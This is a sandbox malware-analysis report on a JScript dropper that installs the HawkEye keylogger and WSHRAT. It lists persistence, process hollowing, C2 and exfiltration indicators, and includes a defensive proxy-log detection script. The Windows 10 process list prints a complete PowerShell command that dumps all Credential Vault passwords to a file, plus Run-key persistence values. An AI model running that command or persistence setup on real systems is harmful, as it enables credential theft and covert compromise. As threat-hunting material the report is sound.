Malware Analysis Report

2025-04-14 08:28

Sample ID 210929-etkycadef4
Target Scano005110.js
SHA256 052a6543d8392cf4c54e7f88f80b41f571ea4e937e3caa6fa9b42a860b40b30c
Tags
hawkeye wshrat keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

052a6543d8392cf4c54e7f88f80b41f571ea4e937e3caa6fa9b42a860b40b30c

Threat Level: Known bad

The file Scano005110.js was found to be: Known bad.

Chain observed in both detonations (summarised from the signature, process, network and file tables below): wscript.exe runs the JScript dropper, which persists by copying itself into the user's Startup folder and writing HKCU and HKLM Run values (wscript.exe //B "...\Scano005110.js"), identifies itself to its controller with a WSHRAT-formatted User-Agent over repeated TCP connections to 192.3.53.74:7121, and drops fthost.exe to %TEMP%. fthost.exe starts a copy of itself as %APPDATA%\Windows Update.exe (same hashes, see Files), the HawkEye stage: it adds its own Run value, takes SeDebugPrivilege, installs a Windows hook (SetWindowsHookEx, consistent with the keylogger tag), looks up the external IP via ip-api.com and whatismyipaddress.com, writes into and sets the thread context of two freshly started vbc.exe instances (process hollowing), which then run with NirSoft's /stext switch and write holdermail.txt and holderwb.txt (MailPassView and WebBrowserPassView output), and connects to mail.legacypharma.com.pk on TCP 587 (SMTP submission, the channel HawkEye uses to mail out collected credentials; the message body was not captured). On the Windows 10 run the script additionally dumps the user's Credential Vault through PowerShell, launches a further dropped cmdc.exe from %TEMP% and repeatedly kills it with cmd /c taskkill /F /IM cmdc.exe.

Malicious Activity Summary

hawkeye wshrat keylogger persistence spyware stealer trojan

HawkEye

WSHRAT

NirSoft MailPassView

NirSoft WebBrowserPassView

Nirsoft

Blocklisted process makes network request

Executes dropped EXE

Uses the VBS compiler for execution

Drops startup file

Loads dropped DLL

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Script User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-29 04:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-29 04:13

Reported

2021-09-29 04:17

Platform

win7v20210408

Max time kernel

150s

Max time network

181s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

WSHRAT

trojan wshrat

NirSoft MailPassView

Description Indicator Process Target
(8 rows, every field N/A: the rule matched but the sandbox captured no per-match details)

NirSoft WebBrowserPassView

Description Indicator Process Target
(8 rows, every field N/A: the rule matched but the sandbox captured no per-match details)

Nirsoft

Description Indicator Process Target
(11 rows, every field N/A: the rule matched but the sandbox captured no per-match details)

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js C:\Windows\system32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js C:\Windows\system32\wscript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe N/A

Uses the VBS compiler for execution

vbc.exe (the .NET Visual Basic compiler, C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe) is started twice by Windows Update.exe (PIDs 1836 and 396) and serves only as a host process for injected code: see the SetThreadContext and WriteProcessMemory entries below and the /stext command lines under Processes. No compilation takes place.

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Notes: the HKLM Run value succeeded because the sandbox user is an administrator; on a standard-user host expect only the HKCU value and the Startup-folder copy. //B runs wscript in batch mode (no dialogs or script errors shown), so the script restarts silently at every logon. The "Windows Update" value data points at ...\Roaming\WindowsUpdate.exe (no space) while the file actually dropped is "Windows Update.exe" (with a space); when hunting on a live host, check both spellings.

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1308 set thread context of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 set thread context of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A (25 identical requests, collapsed; the count matches the 25 TCP connections to 192.3.53.74:7121 in the Network table)
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A (1 request; this is the default User-Agent of the WinHttp.WinHttpRequest.5 COM object, i.e. a script-driven HTTP request, not a browser)

The WSHRAT User-Agent is a pipe-separated host profile (machine and bot identifiers, user name, OS edition, an "av" field reporting no AV, the infection date, the RAT's script version and the geolocated country). It is sent on every beacon and is an easy proxy-side signature.

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1052 wrote to memory of 828 (4 events) N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 828 wrote to memory of 1308 (7 events) N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 1308 wrote to memory of 1836 (10 events) N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 (10 events) N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Repeated rows collapsed with counts. The handful of writes from a parent into a child it has just created are ordinary process-start activity; the sustained writes from Windows Update.exe into the two vbc.exe instances, together with the SetThreadContext calls on the same PIDs above, are the hollowing of vbc.exe with the NirSoft tools.

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js

C:\Users\Admin\AppData\Local\Temp\fthost.exe

"C:\Users\Admin\AppData\Local\Temp\fthost.exe"

C:\Users\Admin\AppData\Roaming\Windows Update.exe

"C:\Users\Admin\AppData\Roaming\Windows Update.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 192.3.53.74:7121 192.3.53.74 tcp (25 connections spread across the whole run, collapsed from 25 identical rows)
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.16.154.36:80 whatismyipaddress.com tcp
US 8.8.8.8:53 mail.legacypharma.com.pk udp
DE 49.12.122.233:587 mail.legacypharma.com.pk tcp (2 connections)

Notes: the 8.8.8.8:53 rows are the sandbox's resolver, not indicators. The TCP 7121 traffic goes straight to an IP with no DNS lookup and its count matches the 25 WSHRAT User-Agent requests in the signature table, so 192.3.53.74:7121 is the WSHRAT command channel. astatech-cn.com is contacted once over HTTP at the start of the run; the report does not record what was requested. TCP 587 is SMTP submission, the channel HawkEye uses to mail out collected credentials.
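A proxy-log detection for the network side of this report, added here as an example and not part of the sandbox output. It parses the WSHRAT User-Agent into fields and scans log lines for the three signals the tables above show: the WSHRAT User-Agent itself, connections to 192.3.53.74:7121, and the default WinHttpRequest User-Agent querying an external-IP lookup service. The log format and the sample lines are constructed for the example, and the names given to the pipe-separated User-Agent fields (hwid, bot_id, ...) are this example's interpretation of the layout seen above, not something WSHRAT documents.

```python
"""Flag WSHRAT beacons and related script traffic in web-proxy logs."""
import re
from dataclasses import dataclass, asdict
from typing import List, Optional

# Indicators taken from the behavioral1 network and User-Agent tables.
C2_ENDPOINTS = {("192.3.53.74", 7121)}
IP_LOOKUP_SERVICES = {"ip-api.com", "whatismyipaddress.com"}
WINHTTP_DEFAULT_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"


@dataclass
class WshratBeacon:
    hwid: str
    bot_id: str
    user: str
    os: str
    av: str
    version: str
    country: str


def parse_wshrat_ua(ua: str) -> Optional[WshratBeacon]:
    """Split a WSHRAT User-Agent into its fields; None if it is not one.

    Field names are this example's reading of the pipe-separated layout
    (WSHRAT|hwid|bot_id|user|os|edition|av|flag - date|version|country)."""
    parts = ua.split("|")
    if len(parts) != 10 or parts[0] != "WSHRAT":
        return None
    return WshratBeacon(hwid=parts[1], bot_id=parts[2], user=parts[3],
                        os=parts[4].strip(), av=parts[6],
                        version=parts[8], country=parts[9])


# Constructed log format for this example: ts src_ip dst_host dst_port "ua"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d+) "([^"]*)"$')


def classify(line: str) -> Optional[dict]:
    """Return a finding dict for a suspicious line, None for everything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, src, host, port, ua = m.groups()
    port = int(port)
    beacon = parse_wshrat_ua(ua)
    if beacon:  # strongest signal: the RAT names itself in the header
        return {"ts": ts, "src": src, "severity": "high",
                "reason": "WSHRAT beacon User-Agent", **asdict(beacon)}
    if (host, port) in C2_ENDPOINTS:  # known C2 regardless of User-Agent
        return {"ts": ts, "src": src, "severity": "high",
                "reason": f"known C2 endpoint {host}:{port}"}
    if ua == WINHTTP_DEFAULT_UA and host in IP_LOOKUP_SERVICES:
        # weaker: a script (not a browser) asking "what is my IP", as the
        # HawkEye stage does right after start-up
        return {"ts": ts, "src": src, "severity": "medium",
                "reason": f"script-style User-Agent querying external IP service {host}"}
    return None


def scan_proxy_log(text: str) -> List[dict]:
    return [hit for hit in (classify(ln) for ln in text.splitlines()) if hit]


# Constructed sample: one beacon, one IP lookup, one benign line, one bare C2 hit.
SAMPLE_LOG = """\
2021-09-29T04:14:02Z 10.0.0.5 192.3.53.74 7121 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands"
2021-09-29T04:14:05Z 10.0.0.5 ip-api.com 80 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
2021-09-29T04:14:09Z 10.0.0.7 example.com 443 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-09-29T04:15:30Z 10.0.0.9 192.3.53.74 7121 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

The beacon check runs first so a hit also yields the host profile (bot_id, user, OS) for the incident record; the bare C2 check catches the same host after a rebuild of the RAT changes its header, and the IP-lookup rule is deliberately scored lower because legitimate scripts do the same thing.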

Files

memory/828-59-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\fthost.exe (two identical entries in the original, collapsed)

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/828-62-0x0000000074D91000-0x0000000074D93000-memory.dmp

memory/828-63-0x00000000005B0000-0x00000000005B1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Windows Update.exe (three identical entries in the original, one of them written without the drive letter, collapsed)

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

All four hashes match fthost.exe: Windows Update.exe is the same dropped binary copied from %TEMP% to %APPDATA%, so one hash set covers both paths when blocking or hunting.

memory/1308-65-0x0000000000000000-mapping.dmp

memory/1308-69-0x0000000000350000-0x0000000000351000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SysInfo.txt

MD5 3c77678429c241c59376b4b284bfa90f
SHA1 5e23f969a6e5071334c2fff7c1a5cc8b4a1f0633
SHA256 d4408efc9b2e8d03cc3ed7234204c241acd033aa6014ae1804c1df3ffcc8e9f1
SHA512 f8853fbe92f7b3cf13270ebbcc281226a59a522c8b9dc6b87f9c74168f4dec8eb4db7f952887cf86591bbfbce9768c14d4dec75af41200842ac5611a4fe7a0c1

memory/1308-71-0x0000000000366000-0x0000000000367000-memory.dmp

memory/1836-72-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1836-73-0x0000000000411654-mapping.dmp

memory/1836-75-0x0000000000400000-0x000000000041B000-memory.dmp

memory/396-77-0x0000000000442628-mapping.dmp

memory/396-76-0x0000000000400000-0x0000000000458000-memory.dmp

memory/396-79-0x0000000000400000-0x0000000000458000-memory.dmp

The two vbc.exe instances carry images of different size at the same base (0x400000-0x41B000 in PID 1836, 0x400000-0x458000 in PID 396) with different entry points: two different payloads were written into the hollowed compiler processes, matching the two /stext output files (holdermail.txt and holderwb.txt) under Processes. These dumps, not the vbc.exe on disk, are what to pull for the credential-stealer samples.

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-29 04:13

Reported

2021-09-29 04:16

Platform

win10-en-20210920

Max time kernel

147s

Max time network

155s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

WSHRAT

trojan wshrat

NirSoft MailPassView

Description Indicator Process Target
(10 rows, every field N/A: the rule matched but the sandbox captured no per-match details)

NirSoft WebBrowserPassView

Description Indicator Process Target
(7 rows, every field N/A: the rule matched but the sandbox captured no per-match details)

Nirsoft

Description Indicator Process Target
(13 rows, every field N/A: the rule matched but the sandbox captured no per-match details)

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js C:\Windows\system32\wscript.exe N/A

Uses the VBS compiler for execution

As on Windows 7, vbc.exe (the .NET Visual Basic compiler) is started twice by Windows Update.exe (PIDs 1972 and 600) and used only as a host process for injected code: see the SetThreadContext and WriteProcessMemory entries below and the /stext command lines under Processes.

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Notes: same three persistence points as on Windows 7 (HKCU Run, HKLM Run, Startup folder). The HKLM write again relies on the sandbox user being an administrator, and the "Windows Update" value again names ...\Roaming\WindowsUpdate.exe (no space) while the dropped file is "Windows Update.exe" (with a space); check both spellings when hunting.

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2004 set thread context of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 set thread context of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A (28 identical requests, collapsed)
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A (1 request; default User-Agent of the WinHttp.WinHttpRequest.5 COM object)

Only the machine identifier, bot identifier and OS edition differ from the Windows 7 run; the layout, script version (JavaScript-v3.4) and date are the same, which is what makes the header a stable signature across victims.

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2176 wrote to memory of 2768 (3 events) N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 2768 wrote to memory of 2004 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 2004 wrote to memory of 1972 (9 events) N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 (9 events) N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2176 wrote to memory of 3952 (2 events) N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 3776 (2 events) N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 3776 wrote to memory of 1300 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2176 wrote to memory of 2528 (2 events) N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 2976 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2176 wrote to memory of 652 (3 events) N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 2176 wrote to memory of 3956 (2 events) N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 1528 (2 events) N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 3496 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2176 wrote to memory of 4004 (2 events) N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 4004 wrote to memory of 980 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2176 wrote to memory of 1804 (3 events) N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe

Repeated rows collapsed with counts. The two- and three-event entries are the parent's normal writes into a child it has just created and simply trace the process tree: wscript.exe (2176) is the hub that launches fthost.exe, powershell.exe, four cmd.exe/taskkill.exe pairs and two runs of the dropped cmdc.exe. The nine-event writes from Windows Update.exe (2004) into each vbc.exe, paired with the SetThreadContext calls above, are the hollowing.

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js

C:\Users\Admin\AppData\Local\Temp\fthost.exe

"C:\Users\Admin\AppData\Local\Temp\fthost.exe"

C:\Users\Admin\AppData\Roaming\Windows Update.exe

"C:\Users\Admin\AppData\Roaming\Windows Update.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

Network

Country Destination Domain Proto
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.16.154.36:80 whatismyipaddress.com tcp
US 8.8.8.8:53 mail.legacypharma.com.pk udp
DE 49.12.122.233:587 mail.legacypharma.com.pk tcp

Files

C:\Users\Admin\AppData\Local\Temp\fthost.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/2768-115-0x0000000000000000-mapping.dmp

memory/2768-118-0x0000000000900000-0x0000000000901000-memory.dmp

C:\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/2004-119-0x0000000000000000-mapping.dmp

memory/2004-122-0x0000000002D40000-0x0000000002D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SysInfo.txt

MD5 3c77678429c241c59376b4b284bfa90f
SHA1 5e23f969a6e5071334c2fff7c1a5cc8b4a1f0633
SHA256 d4408efc9b2e8d03cc3ed7234204c241acd033aa6014ae1804c1df3ffcc8e9f1
SHA512 f8853fbe92f7b3cf13270ebbcc281226a59a522c8b9dc6b87f9c74168f4dec8eb4db7f952887cf86591bbfbce9768c14d4dec75af41200842ac5611a4fe7a0c1

memory/1972-124-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1972-125-0x0000000000411654-mapping.dmp

memory/2004-127-0x0000000002D44000-0x0000000002D46000-memory.dmp

memory/2004-126-0x0000000002D41000-0x0000000002D42000-memory.dmp

memory/1972-128-0x0000000000400000-0x000000000041B000-memory.dmp

memory/600-129-0x0000000000400000-0x0000000000458000-memory.dmp

memory/600-130-0x0000000000442628-mapping.dmp

memory/600-131-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f94dc819ca773f1e3cb27abbc9e7fa27
SHA1 9a7700efadc5ea09ab288544ef1e3cd876255086
SHA256 a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA512 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

memory/3952-133-0x0000000000000000-mapping.dmp

memory/3952-138-0x0000022142EE0000-0x0000022142EE2000-memory.dmp

memory/3952-139-0x0000022142EE3000-0x0000022142EE5000-memory.dmp

memory/3952-140-0x000002215B1B0000-0x000002215B1B1000-memory.dmp

memory/3952-143-0x000002215B360000-0x000002215B361000-memory.dmp

memory/3952-144-0x000002215B2F0000-0x000002215B2F1000-memory.dmp

memory/3952-151-0x000002215B3E0000-0x000002215B3E1000-memory.dmp

memory/3952-152-0x0000022142EE6000-0x0000022142EE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c416c12d1b2b1da8c8655e393b544362
SHA1 fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA256 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
